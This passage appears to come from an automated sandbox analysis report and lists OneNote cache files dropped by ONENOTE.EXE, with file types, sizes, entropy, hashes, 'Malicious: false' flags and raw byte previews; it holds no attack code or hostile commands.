SHA-512:	52AE095F359EE59D479CD5DB3BED285CDCF323C9255393D143CAEDEC8861C8F477E2D8BB547F34C348505ED0351597C8A2F365D78CD61BF4706C3BB51BEF94CC
Malicious:	false
Preview:	2...>...v.......v.......@ ..X)..2...>...2.......v.......@...H(...........................................................................................................................................I.......I.qk..B.....LZ...H.......N......z.6.....N......z.6.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............ZN..O.....3l3>#^....N...^................L.....M.&....q.................................................I.qk..B.....LZ............ZN..O.....3l3>#^............................................................................................j......T%a......5............z...................M...............;........4...4...4...............3..L..S..K....z...y.. x.. ........ ..$...$........D..........7...7.........*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.9....................................;.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.626606803245197
Encrypted:	false
SSDEEP:	192:rs/0Rah+dhjvijBWv1sFGmP0X+Z/y2cXH2O3ORpF2CgQc9S90mTFAsIfO39s+s:Q8sej8BWv1C3P0OZy2+H2JRpFXgQgS9f
MD5:	D873FE94CE937AC0BE699D2A106EA0E0
SHA1:	1AE5085301256EB6DB8E1827B159A57523A704B7
SHA-256:	F5A32DE84E26F0E4E4F1DA455254EABE5E6E0AED568050ACC8986BE02B27C2B2
SHA-512:	2349D1B2FAA09EF20ADC7856011A264CBA7CF3E27585D4E4F74821E59E3FFE46A934059C15A7E8BC5730CD4E83F96B4567E9E528D522A0869F9F86891281AEAB
Malicious:	false
Preview:	2...>...&...j...v...>.... ...,..2...>...........v.......@....+..............................................................................................................................................N.......).....\6...).I.......I.qk..B.....LZ....).....\6...).....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............t..R.0..:..........N...^...................-..A...s.a.............t....................................I.qk..B.....LZ............t..R.0..:......................................................................................................j.......T(................@.......c.......p.....$.\.$...$.................;........4...4...4................3.........z...y.. x.. ...........$...........7...7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.6..............z.......R......................7............S.y.m.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.9148455201741044
Encrypted:	false
SSDEEP:	192:gsgv9H69gJQCHwWjrBYMljEvYfQOtrkd68i8K3RrYY0TrnhSHX1GReaF/MPFmMZt:FwH6mJHHwWnBll4AYikd6X8KhYXTrhUt
MD5:	F2A53C54089A8796CBFFBC77F2BFAF52
SHA1:	2066540670A6ED12506BE11817A273EA471A1809
SHA-256:	44CBC78AD5D52BD295AD939D5E8F03C4184CFEAE5FC321544BB9F87BB6E422A5
SHA-512:	2D9E792FE524FCA5432F2D3E906A52A62AE0B0B3C4088331E361469191DFCCF309F7DA8E4C2691FBA6161FF4C90AD8E8FCC8E2591790E5EF5246A2FF3762241A
Malicious:	false
Preview:	....>......."...v....... ..."......>.......r...v...>...@....!...........................................................................................................................................I.......I.qk..B.....LZ.Hk......Hk.:\..#.i...R..Hk.:\..#.i...Rd.Hk.4........1.I..s4....I.qk..B.....LZ.I............I.......I...................................................I.t.....I................................................................4..'...'.....................4<c.........N...^...............:l~.Qv.O.P\|N.J.`............r...............................z....I.qk..B.....LZ....................4<c.......................................Hk......Hk......Hk.........................................Hk......Hk.:\..#.i...Rd4...8...4........1.I..s2................................I................................Hkj.....HkT&\|...Hk......Hk..8..4.......4....Y..4.......4..$.7......4..!4....z...,4. ............................"......$...7...............T.u.e.s.d.a.y.,. .J.u.l.y. .2.8.,.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	59707
Entropy (8bit):	7.858445368171059
Encrypted:	false
SSDEEP:	1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
MD5:	47ADB0DF6FDA756920225A099B722322
SHA1:	851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
SHA-256:	EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
SHA-512:	85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........\|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.848637923318488
Encrypted:	false
SSDEEP:	192:K6sf2CzVTAD99jUDQHssjWERHA1UhjCNjdjpXNHQKRlxD:W+C6Rl82cOCVFpJQKRl
MD5:	628F63257E3760CC55FBF287887C07F8
SHA1:	0BC2FC4090F2253CE4E618A1BC6A03E12047ADE6
SHA-256:	8297E7BD5A9CCBAAD66D78EB4894E6615F1238DF968B4DDB01CBDD76F68F6BCC
SHA-512:	C66027777743866AD299DE4EF7E848B0DCD1FED66E60823FFDF8646F256A608F9D5E727421A7410908CD96D4B4A0E8FB7D263AC56250D74938AE8AB40B8E6761
Malicious:	false
Preview:	2...>...........v.......H ...!..2...>...R...,...v.......@.... ...........................................................................................................................................I.......I.qk..B.....LZ..>.<.....>F...;..^Kz,...>F...;..^Kz,...>..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............hW.......B..z......N...^....................&.M....g...............P...............................4....I.qk..B.....LZ.............hW.......B..z.....................................>.......>.......>...........................................>j......>T.q....>.......>..]....>H......> .@....>$......>..d...............;........4...4...4..............z.......R......................7............S.y.m.b.o.l.......................'..>%..>..z...,4. .......$>........4..p..7........................................;........4...4...4

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	5.305332220924444
Encrypted:	false
SSDEEP:	384:TEJ2DxA75iwCYq0MkK1nWntNLykNHDLBS5UahPXgulkqw/CxZK6mDrDrWKO:TEhekNK7RE
MD5:	8ADAE1838742B0A40A52965202F0FF03
SHA1:	43EE6FF047A4BC995BA04818D49ED2C5309413DC
SHA-256:	EC57CE90E1F14BD7BAFD35C4BEA03514A90C4A22CCE26B703194D2E84E182DCB
SHA-512:	073E647DF70C2508EA2F3E1F305B9E0D303E6D2C1ABB972C7F540B2C2CA88DEFB8B018129F57C712ED406B499ABFDB1A53B26595A1FC9A76E212896F47E40C20
Malicious:	false
Preview:	@.......(...........@....@... .. L......@...................\...`J... ...J..............................................................................@........................J... ..@K............................@...m.iKH.............R..,........C.g..Y...0...c!.C..j..k.4...t..Ka..j.....FS..X.5Y~#..gr..F...........C.......C..................................................e..T....`..T./....!T....n"T.m...!%T%.....6T!....ENT%5....aT!5...........0...........e....4.........................Ap.H..@.AFJy.k.....(.....x.....(...(...B.a.c.k.g.r.o.u.n.d. .-. .O.r.a.n.g.e...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.r...P.a.g.e.V.e.r.C.o.m.m.e.n.t...P.a.g.e.O.v.e.r.i.d.e...P.a.g.e.N.a.m.e...2...0.0.0.2.4...1.....0...U.n.t.i.t.l.e.d. .p.a.g.e....wT......wT.J{..'_.L.:N.s.....*.s.C.CH.}8DZ. .2...^...............D...`... .......e...06....!..!%.(.A.S@B...............0...........e....4.........................A..:4E.2..p1......(...`.i.....(...(...B.a.c.k.g.r.o.u.n.d. .-. .Y.e.l.l.o.w...j...P.a.g.e.L.o.c.I.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.0316665723224245
Encrypted:	false
SSDEEP:	96:0s3gyfGkoEaueXa9zUETtRLOrrprorar8rpqrrir:0swy7VaueXa9z5RLO
MD5:	C4E701C1E77CE39BC5CAA4FE563C3253
SHA1:	7E3B2991AB241C6E7EF4DFF81134EBA45DE71E4D
SHA-256:	F314CCCDFEB8B9943D1D778A57217EE0236DB989FB8C0D4044C2CFD4B450D557
SHA-512:	29ACE8EB03EAF4DA74CD6DC2B0DF07DBD581673B61FE20ECD6B23826E1012941F224D3AC4139E629B1FB1B01AE0DF8D3A53956FFE6FAE5E26CD01E92A382E468
Malicious:	false
Preview:	2...>....... ...v....................................................?....?.............................................................................2...>.......\|...v...H............................I.......I.qk..B.....LZ.1t......1t..R.......S..1t..R.......S..1t..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.....................\;.J>......N...^...............A......@..&...`.........f........................................I.qk..B.....LZ....................\;.J>..................\;.J>............1t......1t......1t..........................................1tj.....1tT.]...1t......1t..B...1tH.....1t..B...1t..>.).1t..J...................;........4...4...4.."...............1t..1t..1t..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........1t......1t....#.1t............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.08730859862972
Encrypted:	false
SSDEEP:	96:1sVFT/WE69MEsX49KYKTTRygmLVDIBHSD9y06:1sVZ1YpsX49K3nRyTLVDSHSDU06
MD5:	2FE106D18BB1296AD745A7463424DB79
SHA1:	F92BD1C851A86557104FD009F08DE9A928107A7F
SHA-256:	15D02DC21FF9601FB31D9CAE73D933F245704B7258B9C1C4D21AC48FE3257E97
SHA-512:	0E2D38D684F4242C944C25686C1A2CC536C0D74C2C7393E74D31D21057264B715FE33756A68CF56CA0AF92A58F3C533AF79914153E840936A8C5B53CCE082122
Malicious:	false
Preview:	2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZ.$.......$.....:/g.....$.....:/g.....$...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............-!..)^..(..~Y2....N...^................n..B..A....U.%s........f........................................I.qk..B.....LZ.............-!..)^..(..~Y2.........-!..)^..(..~Y2..........$.......$.......$...........................................$.j.....$.T.]...$.......$...B...$.H.....$...B...$...>.).$...J...................;........4...4...4.."...............$...$...$...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........$.......$.....#.$.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.0261495635989935
Encrypted:	false
SSDEEP:	48:RslioqSUZ6trqJgE3p2X89haOOToOrd6rOeIXdXpDXSHKtLtZVyg:RsmZ6tdE3oX89AOOTHRiOHRVy
MD5:	827B6178B551E63015FD80B028AD2558
SHA1:	0A019B6649755F802C39F5B8862439FC4D03134C
SHA-256:	CC439DF377CF9863DDA06AE4D9B64602AE634115E23FFED81746BCD087DD206A
SHA-512:	B02634D8C659D68F8A4CEE6FD3F864D3763066BE2C06D58C0A9E3DB0A5225D9DF9B9F95B04D72511C7E6889A3FA453A2541560C411EC98800FD00941D829348E
Malicious:	false
Preview:	2...>.......$...v.......................................................................................................................................2...>...........v...L............................I.......I.qk..B.....LZ.o.......o...,.>..@.I..o...,.>..@.I..o...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............a2 h.....1I".T.....N...^................[.....O....4..t........f........................................I.qk..B.....LZ.............a2 h.....1I".T..........a2 h.....1I".T...........o.......o.......o...........................................o.j.....o.T.]...o.......o..B...o.H.....o...B...o...>.).o...J...................;........4...4...4.."...............o...o...o...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........o.......o.....#.o.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.049510191538986
Encrypted:	false
SSDEEP:	96:9sQ7sQ+vq/EDX4v9E5TJRrTBcq/z/qq/PQ/5q/z/r2/W/o:9sKsv9DX4v9E5dRrTCqrSqnQxqr6+
MD5:	A797C4245BE07A92CB47DCC852C143D9
SHA1:	EF06B0D1ED94C7847EF2E8861308F1C91879CDA1
SHA-256:	EAC7624930125195D9A488BBBF86E5F74942BA560ED15980FAEDCE3488543CFC
SHA-512:	85923BE3764D876350812B7DC94F2CD5CCA6363FF61D09E86C70878367D5CAC04EC07B38A37D108B97DE7C8642AD9FEFE713E08FE1083516FB7E43FE81ECCEE5
Malicious:	false
Preview:	2...>.......$...v.......................................................................................................................................2...>...........v...L............................I.......I.qk..B.....LZ7n8.....7n8....%.W_...7n8....%.W_...7n8..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............\8..Q....T.R..^....N...^...............A.eO...D.%nz...&........f........................................I.qk..B.....LZ............\8..Q....T.R..^........\8..Q....T.R..^.........7n8.....7n8.....7n8.........................................7n8j....7n8T.]..7n8.....7n8..B..7n8H....7n8..B..7n8..>.)7n8..J...................;........4...4...4.."..............7n8.7n8.7n8..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........7n8.....7n8....#7n8............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.045149119883495
Encrypted:	false
SSDEEP:	48:9sQ1aOJGYJyzTayt48KMEHhsXCKW9F+t6Toe6rdqr9IQdX8LyGVYYZv/sg:9stTayTjEHqXJW9F+ETaRytys
MD5:	B3727F4315A544D2089417CD3AB4E3E0
SHA1:	9ED1E7072CCC19026868E3D265431B8490522FC1
SHA-256:	022D0CEB5B0582EA8DB987CCE6EC48093742FCE5C3835A8DB71653FA64AC484A
SHA-512:	FB1FA5F60C67418B7E9F910499184D23F8653200B3CB2C75DB01D6CA74AB1B4020512EBCF21DFBC661879D5F6B320106CFA62C4DD55EE780FC94DD6802CB5106
Malicious:	false
Preview:	2...>.......$...v.......................................................................................................................................2...>...........v...L............................I.......I.qk..B.....LZ.t.......t.=P...6G.`..wW.t.=P...6G.`..wW.t...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............v.....k.?d..p.7]....N...^..................P{m.C..tH............f........................................I.qk..B.....LZ............v.....k.?d..p.7]........v.....k.?d..p.7]..........t.......t.......t...........................................t.j.....t.T.]...t.......t...B...t.H.....t...B...t...>.).t...J...................;........4...4...4.."...............t...t...t...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........t.......t.....#.t.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.093913433331725
Encrypted:	false
SSDEEP:	96:iBsVlvh7IFrEqXw9lfuT0RPFUp73qC7UDA:iBsVlFIWqXw9FuYRPCp73qC78A
MD5:	6372D1368F69BFA9A7AADB9DAE693732
SHA1:	50DD6EB522A401FEC1147EA3253241EFC474CE1F
SHA-256:	972CB62CA870CD8AF7F612A1F89F6BAE3FD979FBC02C304A80F6262CEAD578A4
SHA-512:	F47B450E934289D61FEAB9828D35A9A94C47D4BA1C207F047E6F638978D513C1831473D348A68A283892DA104B40C1D4A67F40E3968D29EC142B5FFBB0CC2998
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ..........M/...a....t....M/...a....t.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............G..........rx..;....N...^...............Sw..\|.F...Bt.m........f........................................I.qk..B.....LZ............G..........rx..;........G..........rx..;....................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4......7...7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.091745188277576
Encrypted:	false
SSDEEP:	48:YxsJ9mGcvtdwKEYwfWXlW9BXTos7rdmrLIzdXhBdRR2S7drN:KsmGcvPLEYmWXlW9BXTH7R2gZwYR
MD5:	9BBAF3FB97003E6DFF34839E3D2912EE
SHA1:	DB2DE5D7AF22A89C41E54AA03EDDAE8A8A62F056
SHA-256:	FD495CB8468BC0F7FFDE78074DE3BD77C9D241744FCCC56F4ED061B692A548FD
SHA-512:	19FC14DE799B3311555B7329805FDB8AB2554EB8FFCCFE0361233BD604F3B623B76520683AE9C3E003A1F926CEEB106A545A8A0639EB4E6FCF1C75C043D4D443
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZa.X.....a.X.s[..; ...+..a.X.s[..; ...+..a.X..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............................N...^...............*....YRG.0..(U7........f........................................I.qk..B.....LZ.........................................................a.X.....a.X.....a.X.........................................a.Xj....a.XT.]..a.X.....a.X..B..a.XH....a.X..B..a.X..>.)a.X..J...................;........4...4...4.."..............a.X.a.X.a.X..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........a.X.....a.X....#a.X............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.081161795903706
Encrypted:	false
SSDEEP:	48:YJslhhmdEVlt0JGEn6rFXU9MoAsH6To1rdvlxrroITSdX6lR55jV:ysAdEVlC0EIXU9MoJaTcRHxSK
MD5:	DD25B28803FC7086E8A46F6A73ECCE76
SHA1:	E532EE5A4C1345157778F70A97F58D431ECC1A23
SHA-256:	DD2D684EFA0B55B3C49DFB1605D9FD6388ADCDFD16BE7E3C3EEBDE8F667D6148
SHA-512:	F4E62DB91DB726381604ACF1F1D5CFA9E38CA0788E5DD26E110747ADAFF7A23DF72A08D2E0EFAC34CB71F5159AEF01270347A8E9C7C21DFB75134ADA409C4427
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZU\Q.....U\Q.;...90.#JX..U\Q.;...90.#JX..U\Q..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................cop.5...........N...^...............f.....QM..*v.,HT........f........................................I.qk..B.....LZ................cop.5...................cop.5................U\Q.....U\Q.....U\Q.........................................U\Qj....U\QT.]..U\Q.....U\Q..B..U\QH....U\Q..B..U\Q..>.)U\Q..J...................;........4...4...4.."..............U\Q.U\Q.U\Q..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........U\Q.....U\Q....#U\Q............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.078958984226685
Encrypted:	false
SSDEEP:	96:2s1GM7ggIxtEXgyXs9ACWTQRjDeMD4hfn7:2skgKKXgyXs9ACWcRjD
MD5:	51F6CB934DEA4AC5D92DF30AE3272785
SHA1:	5CB06466CDE453063890255E6FA0B1A4F0771104
SHA-256:	5186BDC8679C29474E06FB39D082DEF39F01F324739056195E67E17FF9B6A9B2
SHA-512:	3352068BC6D1598F6552F1E1965D06D437706D26E438DC38BE9C7C303FEEFA9B0F8E20841D0C76E9D03AC338ED09C0A187BB862855EDC65E010291E29DE0B83D
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ..U.......U.t.....).q.....U.t.....).q.....U..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............$"..i./.$..%2.d.....N...^...............f.`$oY.F..i.Xy..........f........................................I.qk..B.....LZ............$"..i./.$..%2.d.........$"..i./.$..%2.d............U.......U.......U...........................................Uj......UT.]....U.......U..B....UH......U..B....U..>.)..U..J...................;........4...4...4.."................U...U...U..z...y.. x.. ...........$........4......7...7........................;........4...4...4...........U.......U....#..U............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.085666554045384
Encrypted:	false
SSDEEP:	48:YY7UsMXZZkbeMtbeaE8SXw98g7N+TozrdQr+IFXKdX9CpdBRD0Led7o4l:Gs2ZkbeMbErXw988N+T+RIVXK4
MD5:	EC4B607245BDF1E5D0A688504BB90C1C
SHA1:	F16E17D6126A6432354037D0DC0539966BFDC28E
SHA-256:	515BD6F13DEAA31EDD4697814CD171C4E00A0C512B9F1390BF26F58C4C90F41E
SHA-512:	05C4E1109083029C6CCF096C89013811A72C80CF0A1B5F4564F6F2086933A94D2F53FF20A14F25598704321B88224BC8CC1D8BA1AB87CBC7A61E1D0CEB549509
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZY=D.....Y=D..'.#.DC.u3.Y=D..'.#.DC.u3.Y=D..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............^..n.?dX..?......N...^....................p.I.m..kN..........f........................................I.qk..B.....LZ.............^..n.?dX..?...........^..n.?dX..?...........Y=D.....Y=D.....Y=D.........................................Y=Dj....Y=DT.]..Y=D.....Y=D..B..Y=DH....Y=D..B..Y=D..>.)Y=D..J...................;........4...4...4.."..............Y=D.Y=D.Y=D..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........Y=D.....Y=D....#Y=D............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.079537453484379
Encrypted:	false
SSDEEP:	48:Y0Z2sjjYyiSF+t+52ELh9pXk9NUToTrdP7rYIM1dXkRHRD59V:2sgbSF+DEfpXk9NUTSRfy1M5/
MD5:	560EEC65398C70476763ABC7A7F01F3C
SHA1:	8948689BF420EFDF085C83C0B0F4C6BE85C8E887
SHA-256:	7292ED21A81C007A4A3C75426321A6C729A2C5F3EFDD50A6CB785936F54F2E9D
